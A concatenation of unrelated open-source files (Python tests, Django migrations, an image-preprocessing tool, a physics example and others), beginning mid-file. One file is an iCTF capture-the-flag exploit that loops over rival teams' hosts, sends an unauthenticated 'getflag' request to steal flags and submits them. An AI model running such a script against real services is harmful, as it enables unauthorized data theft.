blue_channel_std_dev_key = "{}.blueChannelStdDev".format(image_preprocessing_key_prefix)
pytorch_imagenet_normalization_defaults = {
expected_color_channel_order_key: "rgb",
expected_pixel_range_low_key: 0.0,
expected_pixel_range_high_key: 1.0,
red_channel_mean_key: 0.485,
green_channel_mean_key: 0.456,
blue_channel_mean_key: 0.406,
red_channel_std_dev_key: 0.229,
green_channel_std_dev_key: 0.224,
blue_channel_std_dev_key: 0.225
}
def add_image_preprocessing_metadata(model_path,
color_order_str,
scale_pixel_range,
channel_means,
channel_std_dev,
starting_defaults={}):
metadata_dict = starting_defaults
if color_order_str:
metadata_dict[expected_color_channel_order_key] = color_order_str
if scale_pixel_range:
metadata_dict[expected_pixel_range_low_key] = scale_pixel_range[0]
metadata_dict[expected_pixel_range_high_key] = scale_pixel_range[1]
# Check if both low and high range keys are in or not in the dictionary
    # Check this outside the `if scale_pixel_range:` block to handle default cases as well
if (expected_pixel_range_low_key in metadata_dict) != (expected_pixel_range_high_key in metadata_dict):
raise Exception("Either both or neither of low and high pixel ranges must be specified")
# Assign means and standard deviations in the same order as color_order_str
color_tag_to_mean_keys = {
"r": red_channel_mean_key,
"g": green_channel_mean_key,
"b": blue_channel_mean_key
}
color_tag_to_std_dev_keys = {
"r": red_channel_std_dev_key,
"g": green_channel_std_dev_key,
"b": blue_channel_std_dev_key
}
if color_order_str:
color_order = list(color_order_str)
for channel_idx in range(len(color_order)):
color_tag = color_order[channel_idx]
if channel_means:
metadata_dict[color_tag_to_mean_keys[color_tag]] = channel_means[channel_idx]
if channel_std_dev:
metadata_dict[color_tag_to_std_dev_keys[color_tag]] = channel_std_dev[channel_idx]
else:
if channel_means is not None:
print("Channel means ignored because color order was not specified")
if channel_std_dev is not None:
print("Channel std dev ignored because color order was not specified")
add_input_metadata.add_input_metadata(model_path, metadata_dict)
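# Illustrative programmatic usage (added; "model.ell" is a hypothetical path): the same
# metadata can be attached without going through argparse, for example by starting from the
# Pytorch Imagenet defaults and overriding only the channel order:
#
#   add_image_preprocessing_metadata("model.ell",
#                                    color_order_str="bgr",
#                                    scale_pixel_range=[0.0, 1.0],
#                                    channel_means=[0.485, 0.456, 0.406],
#                                    channel_std_dev=[0.229, 0.224, 0.225],
#                                    starting_defaults=dict(pytorch_imagenet_normalization_defaults))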
if __name__ == "__main__":
parser = argparse.ArgumentParser("Add an image preprocessing metadata tag to the input node of the given model")
parser.add_argument("model", help="The *.ell model to edit")
parser.add_argument("--order", help="The order of color channels the model requires", choices=["rgb", "bgr"])
parser.add_argument("--scale_pixel_range", help="The range to scale pixel values to", nargs=2, type=float,
metavar=("LOW", "HIGH"))
parser.add_argument("--mean", help="The per-channel mean values to subtract from pixel values after scaling",
nargs=3, type=float)
parser.add_argument("--stddev", help="The per-channel standard-deviation of values to divide each channel by "
"after scaling and mean subtraction", nargs=3, type=float)
parser.add_argument("--pytorch_imagenet_normalization", help="Use the defaults for Imagenet normalization with "
"Pytorch ordering, overridden with any other arguments also specified", action="store_true")
args = parser.parse_args()
starting_defaults = {}
if args.pytorch_imagenet_normalization:
starting_defaults = pytorch_imagenet_normalization_defaults
add_image_preprocessing_metadata(args.model,
args.order,
args.scale_pixel_range,
args.mean,
args.stddev,
starting_defaults)
|
src/pretix/base/migrations/0058_auto_20170429_1020.py | pajowu/pretix | 1,248 | 12653623 | <filename>src/pretix/base/migrations/0058_auto_20170429_1020.py
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-04-29 10:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pretixbase', '0052_team_teaminvite'),
]
operations = [
migrations.RemoveField(
model_name='eventpermission',
name='event',
),
migrations.RemoveField(
model_name='eventpermission',
name='user',
),
migrations.RemoveField(
model_name='organizerpermission',
name='organizer',
),
migrations.RemoveField(
model_name='organizerpermission',
name='user',
),
migrations.RemoveField(
model_name='event',
name='permitted',
),
migrations.RemoveField(
model_name='organizer',
name='permitted',
),
migrations.AlterField(
model_name='team',
name='can_change_teams',
field=models.BooleanField(default=False, verbose_name='Can change teams and permissions'),
),
migrations.AlterField(
model_name='team',
name='limit_events',
field=models.ManyToManyField(blank=True, to='pretixbase.Event', verbose_name='Limit to events'),
),
migrations.DeleteModel(
name='EventPermission',
),
migrations.DeleteModel(
name='OrganizerPermission',
),
]
|
tests/test_util_xpub.py | rafa1239/specter-desktop | 683 | 12653631 | <gh_stars>100-1000
import pytest
from cryptoadvance.specter.util.xpub import (
convert_xpub_prefix,
get_xpub_fingerprint,
)
### Tests for xpub
def test_convert_to_ypub(ghost_machine_xpub_49, ghost_machine_ypub):
new_prefix = b"\x04\x9d\x7c\xb2"
assert convert_xpub_prefix(ghost_machine_xpub_49, new_prefix) == ghost_machine_ypub
def test_convert_to_zpub(ghost_machine_xpub_84, ghost_machine_zpub):
new_prefix = b"\x04\xb2\x47\x46"
assert convert_xpub_prefix(ghost_machine_xpub_84, new_prefix) == ghost_machine_zpub
def test_convert_ypub_back(ghost_machine_ypub, ghost_machine_xpub_49):
new_prefix = b"\x04\x88\xb2\x1e"
assert convert_xpub_prefix(ghost_machine_ypub, new_prefix) == ghost_machine_xpub_49
def test_convert_zpub_back(ghost_machine_zpub, ghost_machine_xpub_84):
new_prefix = b"\x04\x88\xb2\x1e"
assert convert_xpub_prefix(ghost_machine_zpub, new_prefix) == ghost_machine_xpub_84
def test_convert_to_upub(ghost_machine_tpub_49, ghost_machine_upub):
new_prefix = b"\x04\x4a\x52\x62"
assert convert_xpub_prefix(ghost_machine_tpub_49, new_prefix) == ghost_machine_upub
def test_convert_to_vpub(ghost_machine_tpub_84, ghost_machine_vpub):
new_prefix = b"\x04\x5f\x1c\xf6"
assert convert_xpub_prefix(ghost_machine_tpub_84, new_prefix) == ghost_machine_vpub
def test_get_xpub_fingerprint(ghost_machine_xpub_44):
# fingerprint from https://jlopp.github.io/xpub-converter/
assert get_xpub_fingerprint(ghost_machine_xpub_44).hex() == "81f802e3"
|
tests/local/test_PacerNotificationEmailTest.py | mmantel/juriscraper | 228 | 12653640 | <filename>tests/local/test_PacerNotificationEmailTest.py
import os
from juriscraper.pacer.email import NotificationEmail, S3NotificationEmail
from tests import TESTS_ROOT_EXAMPLES_PACER
from tests.local.PacerParseTestCase import PacerParseTestCase
TESTS_ROOT_EXAMPLES_PACER_NEF = os.path.join(TESTS_ROOT_EXAMPLES_PACER, "nef")
TESTS_ROOT_EXAMPLES_PACER_NEF_S3 = os.path.join(
TESTS_ROOT_EXAMPLES_PACER, "nef/s3"
)
class PacerNotificationEmailTest(PacerParseTestCase):
def setUp(self):
self.maxDiff = 200000
def test_notification_emails(self):
self.parse_files(
TESTS_ROOT_EXAMPLES_PACER_NEF, "*.html", NotificationEmail
)
class S3PacerNotificationEmailTest(PacerParseTestCase):
def setUp(self):
self.maxDiff = 200000
def test_notification_emails_s3(self):
self.parse_files(
TESTS_ROOT_EXAMPLES_PACER_NEF_S3, "*.txt", S3NotificationEmail
)
|
pantalaimon/thread_messages.py | arthurlutz/pantalaimon | 216 | 12653655 | <reponame>arthurlutz/pantalaimon
# Copyright 2019 The Matrix.org Foundation CIC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import attr
@attr.s
class Message:
pass
@attr.s
class UnverifiedDevicesSignal(Message):
pan_user = attr.ib()
room_id = attr.ib()
room_display_name = attr.ib()
@attr.s
class UnverifiedResponse(Message):
message_id = attr.ib()
pan_user = attr.ib()
room_id = attr.ib()
@attr.s
class SendAnywaysMessage(UnverifiedResponse):
pass
@attr.s
class CancelSendingMessage(UnverifiedResponse):
pass
@attr.s
class KeyRequestMessage(Message):
pan_user = attr.ib(type=str)
event = attr.ib()
@attr.s
class _KeyShare(Message):
message_id = attr.ib()
pan_user = attr.ib()
user_id = attr.ib()
device_id = attr.ib()
@attr.s
class ContinueKeyShare(_KeyShare):
pass
@attr.s
class CancelKeyShare(_KeyShare):
pass
@attr.s
class DaemonResponse(Message):
message_id = attr.ib()
pan_user = attr.ib()
code = attr.ib()
message = attr.ib()
@attr.s
class UpdateUsersMessage(Message):
server = attr.ib()
user_id = attr.ib()
device_id = attr.ib()
@attr.s
class UpdateDevicesMessage(Message):
pan_user = attr.ib(type=str)
devices = attr.ib(type=dict)
@attr.s
class _KeysOperation(Message):
message_id = attr.ib()
pan_user = attr.ib()
file_path = attr.ib()
passphrase = attr.ib()
@attr.s
class ImportKeysMessage(_KeysOperation):
pass
@attr.s
class ExportKeysMessage(_KeysOperation):
pass
@attr.s
class _VerificationMessage(Message):
message_id = attr.ib()
pan_user = attr.ib()
user_id = attr.ib()
device_id = attr.ib()
@attr.s
class DeviceVerifyMessage(_VerificationMessage):
pass
@attr.s
class DeviceUnverifyMessage(_VerificationMessage):
pass
@attr.s
class DeviceBlacklistMessage(_VerificationMessage):
pass
@attr.s
class DeviceUnblacklistMessage(_VerificationMessage):
pass
@attr.s
class SasMessage(_VerificationMessage):
pass
@attr.s
class StartSasMessage(SasMessage):
pass
@attr.s
class CancelSasMessage(SasMessage):
pass
@attr.s
class ConfirmSasMessage(SasMessage):
pass
@attr.s
class AcceptSasMessage(SasMessage):
pass
@attr.s
class _SasSignal:
pan_user = attr.ib()
user_id = attr.ib()
device_id = attr.ib()
transaction_id = attr.ib()
@attr.s
class InviteSasSignal(_SasSignal):
pass
@attr.s
class ShowSasSignal(_SasSignal):
emoji = attr.ib()
@attr.s
class SasDoneSignal(_SasSignal):
pass
|
tests/test_utils.py | JARVIS-AI/EulerPy | 210 | 12653687 | <reponame>JARVIS-AI/EulerPy<gh_stars>100-1000
# -*- coding: utf-8 -*-
import os
import json
import textwrap
import unittest
from EulerPy.problem import Problem
from EulerPy.utils import human_time
EULER_DIR = os.path.dirname(os.path.dirname(__file__))
EULER_DATA = os.path.join(EULER_DIR, 'EulerPy', 'data')
class EulerPyUtils(unittest.TestCase):
def test_problem_format(self):
"""
Ensure each parsed problem only contains one problem (that one problem
does not "bleed" into the next one due to an issue with line breaks)
"""
# Determine largest problem in problems.txt
problems_file = os.path.join(EULER_DATA, 'problems.txt')
with open(problems_file) as f:
for line in f:
if line.startswith('Problem '):
largest_problem = line.split(' ')[1]
for problem in range(1, int(largest_problem) + 1):
problemText = Problem(problem).text
msg = "Error encountered when parsing problem {}.".format(problem)
            self.assertFalse('=========' in problemText, msg=msg)
self.assertFalse('\n\n\n' in problemText, msg=msg)
def test_expected_problem(self):
"""Check that problem #1 returns the correct problem text"""
problem_one = textwrap.dedent(
"""
If we list all the natural numbers below 10 that are multiples of 3 or 5,
we get 3, 5, 6 and 9. The sum of these multiples is 23.
Find the sum of all the multiples of 3 or 5 below 1000.
"""
)
self.assertEqual(problem_one.strip(), Problem(1).text)
def test_filename_format(self):
"""Check that filenames are being formatted correctly"""
self.assertEqual(Problem(1).filename(), "001.py")
self.assertEqual(Problem(10).filename(), "010.py")
self.assertEqual(Problem(100).filename(), "100.py")
def test_time_format(self):
self.assertEqual(human_time(100000), '1d 3h 46m 40s')
def test_problem_resources(self):
"""Ensure resources in `/data` match `resources.json`"""
resources_path = os.path.join(EULER_DATA, 'resources')
def _resource_check(filename, seen_files):
path = os.path.join(resources_path, filename)
# Check that resource exists in `/data`
self.assertTrue(os.path.isfile(path),
'%s does not exist.' % filename)
# Add resource to set `seen_files`
seen_files.add(filename)
with open(os.path.join(EULER_DATA, 'resources.json')) as f:
resource_dict = json.load(f)
seen_files = set()
for item in (v for k, v in resource_dict.items()):
if isinstance(item, list):
for subitem in item:
_resource_check(subitem, seen_files)
else:
_resource_check(item, seen_files)
self.assertEqual(seen_files, set(os.listdir(resources_path)))
|
tests/modules/contrib/test_yubikey.py | spxtr/bumblebee-status | 1,089 | 12653729 | <filename>tests/modules/contrib/test_yubikey.py
import pytest
pytest.importorskip("yubico")
def test_load_module():
__import__("modules.contrib.yubikey")
|
lib/django-1.5/django/contrib/auth/tests/utils.py | MiCHiLU/google_appengine_sdk | 790 | 12653756 | <reponame>MiCHiLU/google_appengine_sdk
from django.conf import settings
from django.utils.unittest import skipIf
def skipIfCustomUser(test_func):
"""
Skip a test if a custom user model is in use.
"""
return skipIf(settings.AUTH_USER_MODEL != 'auth.User', 'Custom user model in use')(test_func)
|
rpython/jit/metainterp/test/test_pyjitpl.py | nanjekyejoannah/pypy | 381 | 12653771 |
# some unit tests for the bytecode decoding
import py
from rpython.jit.metainterp import pyjitpl
from rpython.jit.metainterp import jitprof
from rpython.jit.metainterp.history import ConstInt
from rpython.jit.metainterp.history import History, IntFrontendOp
from rpython.jit.metainterp.resoperation import ResOperation, rop, InputArgInt
from rpython.jit.metainterp.optimizeopt.util import equaloplists
from rpython.jit.codewriter.jitcode import JitCode
def test_portal_trace_positions():
py.test.skip("bleh, too direct test, rewrite or kill")
class jitdriver_sd:
index = 0
class warmstate:
@staticmethod
def get_unique_id(*args):
return 0
class jitdriver:
is_recursive = True
jitcode = JitCode("f")
jitcode.setup(None)
portal = JitCode("portal")
portal.jitdriver_sd = jitdriver_sd
portal.setup(None)
class FakeStaticData:
cpu = None
warmstate = None
warmrunnerdesc = None
mainjitcode = portal
metainterp = pyjitpl.MetaInterp(FakeStaticData(), FakeStaticData())
metainterp.framestack = []
class FakeHistory:
operations = []
@staticmethod
def record(*args):
pass
history = metainterp.history = FakeHistory()
metainterp.newframe(portal, "green1")
history.operations.append(1)
metainterp.newframe(jitcode)
history.operations.append(2)
metainterp.newframe(portal, "green2")
history.operations.append(3)
metainterp.popframe()
history.operations.append(4)
metainterp.popframe()
history.operations.append(5)
metainterp.popframe()
history.operations.append(6)
assert metainterp.portal_trace_positions == [("green1", 0), ("green2", 2),
(None, 3), (None, 5)]
assert metainterp.find_biggest_function() == "green1"
metainterp.newframe(portal, "green3")
history.operations.append(7)
metainterp.newframe(jitcode)
history.operations.append(8)
assert metainterp.portal_trace_positions == [("green1", 0), ("green2", 2),
(None, 3), (None, 5), ("green3", 6)]
assert metainterp.find_biggest_function() == "green1"
history.operations.extend([9, 10, 11, 12])
assert metainterp.find_biggest_function() == "green3"
def test_remove_consts_and_duplicates():
class FakeStaticData:
cpu = None
all_descrs = []
warmrunnerdesc = None
def is_another_box_like(box, referencebox):
assert box is not referencebox
assert box.type == referencebox.type
assert box.getint() == referencebox.getint()
return True
metainterp = pyjitpl.MetaInterp(FakeStaticData(), None)
metainterp.history = History()
b1 = IntFrontendOp(1)
b1.setint(1)
b2 = IntFrontendOp(2)
b2.setint(2)
c3 = ConstInt(3)
boxes = [b1, b2, b1, c3]
dup = {}
metainterp.history.set_inputargs([b1, b2], FakeStaticData())
metainterp.remove_consts_and_duplicates(boxes, 4, dup)
assert boxes[0] is b1
assert boxes[1] is b2
assert is_another_box_like(boxes[2], b1)
assert is_another_box_like(boxes[3], c3)
inp, operations = metainterp.history.trace.unpack()
remap = dict(zip([b1, b2], inp))
assert equaloplists(operations, [
ResOperation(rop.SAME_AS_I, [b1]),
ResOperation(rop.SAME_AS_I, [c3]),
], remap=remap)
assert dup == {b1: None, b2: None}
#
def test_get_name_from_address():
class FakeMetaInterpSd(pyjitpl.MetaInterpStaticData):
def __init__(self):
pass
metainterp_sd = FakeMetaInterpSd()
metainterp_sd.setup_list_of_addr2name([(123, 'a'), (456, 'b')])
assert metainterp_sd.get_name_from_address(123) == 'a'
assert metainterp_sd.get_name_from_address(456) == 'b'
assert metainterp_sd.get_name_from_address(789) == ''
|
backend/config/urls.py | FroggyTaipei/froggy-service | 174 | 12653775 | from django.conf.urls.static import static
from django.conf import settings
from django.urls import path
from django.contrib import admin
from django.conf.urls import include
from rest_framework import permissions
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
from config.api import api
from .site import DashboardSite
admin.site = DashboardSite()
admin.sites.site = admin.site
admin.autodiscover()
schema_view = get_schema_view(
openapi.Info(
title="Froggy's Service API",
default_version='v1',
contact=openapi.Contact(email=settings.SERVER_EMAIL),
license=openapi.License(name="MIT License"),
),
url=settings.DOMAIN,
public=False,
permission_classes=(permissions.AllowAny,),
)
urlpatterns = [
# All Kubernetes services must serve a 200 page at '/', set admin page as index
path('', admin.site.urls, name='admin'),
path('api/', include(api.urls)),
path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),
path('api/swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger'),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns[0] = path('admin/', admin.site.urls, name='admin')
|
nodes/0.7.x/python/Element.Host.py | jdehotin/Clockworkfordynamo | 147 | 12653788 | <reponame>jdehotin/Clockworkfordynamo<gh_stars>100-1000
import clr
clr.AddReference('RevitAPI')
from Autodesk.Revit.DB import *
clr.AddReference("RevitNodes")
import Revit
clr.ImportExtensions(Revit.Elements)
clr.AddReference("RevitServices")
import RevitServices
from RevitServices.Persistence import DocumentManager
doc = DocumentManager.Instance.CurrentDBDocument
faminsts = UnwrapElement(IN[0])
elementlist = list()
for item in faminsts:
try:
elementlist.append(item.Host.ToDSType(True))
except:
# if that doesn't work, maybe it's a WallSweep
try:
hostidlist = list()
for host in item.GetHostIds():
hostidlist.append(doc.GetElement(host).ToDSType(True))
elementlist.append(hostidlist)
except:
elementlist.append(list())
OUT = elementlist |
kansha/alembic/versions/1bd634091036_add_display_week_numbers.py | AnomalistDesignLLC/kansha | 161 | 12653796 | <filename>kansha/alembic/versions/1bd634091036_add_display_week_numbers.py<gh_stars>100-1000
"""add display week numbers
Revision ID: 1bd634091036
Revises: <PASSWORD>
Create Date: 2015-09-15 11:51:46.739150
"""
# revision identifiers, used by Alembic.
revision = '1bd634091036'
down_revision = '<PASSWORD>'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('user', sa.Column('display_week_numbers', sa.Boolean))
def downgrade():
op.drop_column('user', 'display_week_numbers')
|
Patterns/MACD.py | yanding/Stock-Analysis | 357 | 12653803 | '''
Author: <NAME>
Date: 8/17/2018
Description: Creates a dataframe with moving averages and MACD oscillator
'''
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from datetime import datetime, timedelta
from iexfinance import get_historical_data
moving_avg1 = 10
moving_avg2 = 20
ticker = "BABA"
now = datetime.now()
start = now - timedelta(days=90)
df = get_historical_data(ticker, start=start, end=now, output_format='pandas')
def macd(dat):
dat['10dma'] = dat['close'].rolling(window=moving_avg1, min_periods=1).mean()
dat['20dma'] = dat['close'].rolling(window=moving_avg2, min_periods=1).mean()
return dat
def add_macd(df):
df = macd(df)
df['position'] = 0
    df.loc[df.index[moving_avg1:], 'position'] = np.where(df['10dma'][moving_avg1:] >= df['20dma'][moving_avg1:], 1, 0)
df['signals'] = df['position'].diff()
df['oscillator'] = df['10dma'] - df['20dma']
return df
df = add_macd(df)
# print(df)
print(df.loc[df['signals'] == 1])
print(df.loc[df['signals'] == -1])
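# Optional visualisation sketch (added; assumes the column names produced by add_macd above).
# matplotlib is already imported as plt, so the moving averages and the oscillator can be
# plotted directly to sanity-check the crossover signals:
fig, (ax_price, ax_osc) = plt.subplots(2, 1, sharex=True)
df[['close', '10dma', '20dma']].plot(ax=ax_price, title=ticker)
df['oscillator'].plot(ax=ax_osc, title='MACD oscillator (10dma - 20dma)')
ax_osc.axhline(0, linewidth=0.5)
plt.show()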
|
client/python/tests/test_single_packet.py | TimeToogo/fire-and-forget-http | 747 | 12653826 | <reponame>TimeToogo/fire-and-forget-http<gh_stars>100-1000
from ff_client import FfClient, FfConfig, FfRequest
import unittest
import logging
import time
class TestFfClientSinglePacket(unittest.TestCase):
def test_create_request_packets_for_get_request(self):
client = FfClient(FfConfig(ip_address='127.0.0.1',
port=8080, log_level=logging.DEBUG))
http_request = "GET / HTTP/1.1\nHost: google.com.au\n\n"
packets = client.create_request_packets(http_request, https=False)
        payload_options_length = 11 + 3 # Timestamp option + EOL option
self.assertEqual(1, len(packets))
packet1_buff = packets[0].payload
packet1_len = packets[0].length
ptr = 0
self.assertEqual(73, packet1_len)
# Request version
self.assertEqual(FfRequest.Version.V1,
packet1_buff[ptr] << 8 | packet1_buff[ptr + 1])
ptr += 2
# Request ID
self.assertNotEqual(0, (
packet1_buff[ptr] << 56
| packet1_buff[ptr + 1] << 48
| packet1_buff[ptr + 2] << 40
| packet1_buff[ptr + 3] << 32
| packet1_buff[ptr + 4] << 24
| packet1_buff[ptr + 5] << 16
| packet1_buff[ptr + 6] << 8
| packet1_buff[ptr + 7]
))
ptr += 8
# Total length
self.assertEqual(len(http_request) + payload_options_length, (
packet1_buff[ptr] << 24
| packet1_buff[ptr + 1] << 16
| packet1_buff[ptr + 2] << 8
| packet1_buff[ptr + 3]
))
ptr += 4
# Chunk offset
self.assertEqual(0, (
packet1_buff[ptr] << 24
| packet1_buff[ptr + 1] << 16
| packet1_buff[ptr + 2] << 8
| packet1_buff[ptr + 3]
))
ptr += 4
# Chunk length
self.assertEqual(len(http_request) + payload_options_length, (
packet1_buff[ptr] << 8
| packet1_buff[ptr + 1]
))
ptr += 2
# Break option type
self.assertEqual(FfRequest.Option.Type.BREAK, packet1_buff[ptr])
ptr += 1
# Break option length
self.assertEqual(0, packet1_buff[ptr] << 16 | packet1_buff[ptr + 1])
ptr += 2
# Timestamp option type
self.assertEqual(FfRequest.Option.Type.TIMESTAMP, packet1_buff[ptr])
ptr += 1
# Timestamp option length
self.assertEqual(8, packet1_buff[ptr] << 16 | packet1_buff[ptr + 1])
ptr += 2
# Timestamp option value
self.assertAlmostEqual(
time.time(),
packet1_buff[ptr] << 56
| packet1_buff[ptr + 1] << 48
| packet1_buff[ptr + 2] << 40
| packet1_buff[ptr + 3] << 32
| packet1_buff[ptr + 4] << 24
| packet1_buff[ptr + 5] << 16
| packet1_buff[ptr + 6] << 8
| packet1_buff[ptr + 7],
delta = 5
)
ptr += 8
# EOL option type
self.assertEqual(FfRequest.Option.Type.EOL, packet1_buff[ptr])
ptr += 1
# EOL option length
self.assertEqual(0, packet1_buff[ptr] << 16 | packet1_buff[ptr + 1])
ptr += 2
# Payload
self.assertEqual(bytearray(http_request.encode('utf8')),
packet1_buff[ptr:packet1_len])
|
neo/Prompt/PromptPrinter.py | volekerb/neo-python | 387 | 12653833 | <gh_stars>100-1000
from prompt_toolkit import print_formatted_text
from prompt_toolkit.formatted_text import FormattedText
from prompt_toolkit.styles import Style
from neo.UserPreferences import preferences
import os
import sys
token_style = Style.from_dict({
"command": preferences.token_style['Command'],
"neo": preferences.token_style['Neo'],
"default": preferences.token_style['Default'],
"number": preferences.token_style['Number'],
})
class PromptPrinter():
def __init__(self):
self.printer = self._internal_prompt_print
def reset_printer(self):
self.printer = self._internal_prompt_print
def _internal_prompt_print(self, *args, **kwargs):
kwargs['sep'] = kwargs.pop('sep', ' ')
kwargs['end'] = kwargs.pop('end', '\n')
kwargs['file'] = kwargs.pop('file', sys.stdout)
kwargs['style'] = token_style
frags = []
for a in args:
if isinstance(a, FormattedText):
frags.append(a)
else:
frags.append(FormattedText([("class:command", str(a))]))
print_formatted_text(*frags, **kwargs)
def print(self, *args, **kwargs):
if 'NEOPYTHON_UNITTEST' in os.environ:
print(*args, **kwargs)
else:
self.printer(*args, **kwargs)
pp = PromptPrinter()
def prompt_print(*args, **kwargs):
pp.print(*args, **kwargs)
|
iCTF/2018/fantasticiot/exploit.py | Per5ianCat/ctf-writeups | 476 | 12653842 | #!/usr/bin/env python2
# This code was written 10 hours before the competition, yikes
# Any bugs are your problem
import socks # pip install PySocks
import socket
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1', 4444)
socket.socket = socks.socksocket
from pwn import * # pip install pwntools
from swpag_client import Team # pip install swpag_client
import time
import traceback
import json
import sys
team = Team(None, "xxxxxxxxxxxxxxxxxxx")
def team_ip(team_host):
# 172.31.129.1 (team1) ... 172.31.129.254 (team254) ... 172.31.130.1 (team255) ...
team_number = int(team_host[4:])
minor = ((team_number - 1) % 254) + 1
major = (team_number / 255) + 129
return '172.31.{major}.{minor}'.format(major=major, minor=minor)
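# Worked examples (added): with Python 2 integer division the mapping above gives
# team_ip('team1') == '172.31.129.1', team_ip('team254') == '172.31.129.254' and
# team_ip('team255') == '172.31.130.1', matching the comment inside team_ip.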
services = team.get_service_list()
service_flag_ids = dict()
while True:
for service in services:
if service['service_name'] != 'fantasticiot':
continue
print("Going to attack", service['service_name'])
if service['service_name'] not in service_flag_ids:
service_flag_ids[service['service_name']] = set()
targets = team.get_targets(service['service_id'])
flag_list = []
for target in targets:
flag_id = target['flag_id']
ip = team_ip(target['hostname'])
port = target['port']
if flag_id not in service_flag_ids[service['service_name']]:
try:
                    conn = remote(ip, port, timeout=1)
# exploitation happens here
conn.sendline('{"service": "flag", "op": "getflag", "id": "%s", "token": ""}' % flag_id)
flag = json.loads(conn.recv().strip())['flag']
conn.close()
flag_list.append(flag)
print("HACKED")
except Exception as e:
print("Error connecting to", target['team_name'], target['hostname'], ip, port)
print(e)
service_flag_ids[service['service_name']].add(flag_id)
result = team.submit_flag(flag_list)
print result
time.sleep(10) # DOS is against the rules
|
examples/scripts/example24.py | Alehud/QuSpin | 195 | 12653845 | <gh_stars>100-1000
from __future__ import print_function, division
#
import sys,os
os.environ['KMP_DUPLICATE_LIB_OK']='True' # uncomment this line if omp error occurs on OSX for python 3
os.environ['OMP_NUM_THREADS']='1' # set number of OpenMP threads to run in parallel
os.environ['MKL_NUM_THREADS']='1' # set number of MKL threads to run in parallel
#
quspin_path = os.path.join(os.getcwd(),"../../")
sys.path.insert(0,quspin_path)
################################################################################
# example 24 #
# This example shows how to use the `user_basis` to define Majorana operators. #
################################################################################
from quspin.operators import hamiltonian # Hamiltonians and operators
from quspin.basis import spinless_fermion_basis_1d # Hilbert space fermion basis_1d
from quspin.basis.user import user_basis # Hilbert space user basis
from quspin.basis.user import next_state_sig_32,op_sig_32,map_sig_32,count_particles_sig_32 # user basis data types signatures
from numba import carray,cfunc,jit # numba helper functions
from numba import uint32,int32 # numba data types
import numpy as np
from scipy.special import comb
np.set_printoptions(suppress=True, precision=6)
#
N=6 # lattice sites
#
############ create spinless fermion user basis object #############
#
@jit(uint32(uint32,uint32),locals=dict(f_count=uint32,),nopython=True,nogil=True)
def _count_particles_32(state,site_ind):
# auxiliary function to count number of fermions, i.e. 1's in bit configuration of the state, up to site site_ind
# CAUTION: 32-bit integers code only!
f_count = state & ((0x7FFFFFFF) >> (31 - site_ind));
f_count = f_count - ((f_count >> 1) & 0x55555555);
f_count = (f_count & 0x33333333) + ((f_count >> 2) & 0x33333333);
return (((f_count + (f_count >> 4)) & 0x0F0F0F0F) * 0x01010101) >> 24
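# Worked example (added): for site_ind = 2 the mask 0x7FFFFFFF >> 29 keeps only the two
# lowest bits (sites 0 and 1), so for state = 0b1011 the function returns 2 -- the number of
# fermions occupying sites strictly below site_ind, which fixes the Jordan-Wigner sign below.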
#
@cfunc(op_sig_32,
locals=dict(s=int32,sign=int32,n=int32,b=uint32,f_count=uint32), )
def op(op_struct_ptr,op_str,site_ind,N,args):
# using struct pointer to pass op_struct_ptr back to C++ see numba Records
op_struct = carray(op_struct_ptr,1)[0]
err = 0
#
site_ind = N - site_ind - 1 # convention for QuSpin for mapping from bits to sites.
#####
f_count = _count_particles_32(op_struct.state,site_ind)
#####
sign = -1 if f_count&1 else 1
n = (op_struct.state>>site_ind)&1 # either 0 or 1
b = (1<<site_ind)
#
if op_str==120: # "x" is integer value 120 = ord("x")
op_struct.state ^= b
op_struct.matrix_ele *= sign
elif op_str==121: # "y" is integer value 120 = ord("y")
op_struct.state ^= b
op_struct.matrix_ele *= -1.0j*sign*((n<<1)-1)
elif op_str==43: # "+" is integer value 43 = ord("+")
op_struct.matrix_ele *= (0.0 if n else sign)
op_struct.state ^= b # create fermion
elif op_str==45: # "-" is integer value 45 = ord("-")
op_struct.matrix_ele *= (sign if n else 0.0)
        op_struct.state ^= b # annihilate fermion
elif op_str==110: # "n" is integer value 110 = ord("n")
op_struct.matrix_ele *= n
elif op_str==73: # "I" is integer value 73 = ord("I")
pass
else:
op_struct.matrix_ele = 0
err = -1
#
return err
op_args=np.array([],dtype=np.uint32)
#
###### define symmetry maps
#
@cfunc(map_sig_32,
locals=dict(shift=uint32,xmax=uint32,x1=uint32,x2=uint32,period=int32,l=int32,f_count1=int32,f_count2=int32) )
def translation(x,N,sign_ptr,args):
""" works for all system sizes N. """
shift = args[0] # translate state by shift sites
period = N # periodicity/cyclicity of translation
xmax = args[1]
#
l = (shift+period)%period
x1 = (x >> (period - l))
x2 = ((x << l) & xmax)
#
#####
# count number of fermions, i.e. 1's in bit configuration of x1
f_count1 = _count_particles_32(x1,period)
# count number of fermions, i.e. 1's in bit configuration of x2
f_count2 = _count_particles_32(x2,period)
#####
# compute fermion sign
sign_ptr[0] *= (-1 if ((f_count1&1)&(f_count2&1)&1) else 1)
#
return (x2 | x1)
T_args=np.array([1,(1<<N)-1],dtype=np.uint32)
#
@cfunc(map_sig_32,
locals=dict(out=uint32,s=uint32,f_count=int32) )
def parity(x,N,sign_ptr,args):
""" works for all system sizes N. """
out = 0
s = args[0]
#
#####
# count number of fermions, i.e. 1's in bit configuration of the state
f_count = _count_particles_32(x,N)
#####
sign_ptr[0] *= (-1 if ((f_count&2) and 1) else 1)
#
out ^= (x&1)
x >>= 1
while(x):
out <<= 1
out ^= (x&1)
x >>= 1
s -= 1
#
out <<= s
return out
P_args=np.array([N-1],dtype=np.uint32)
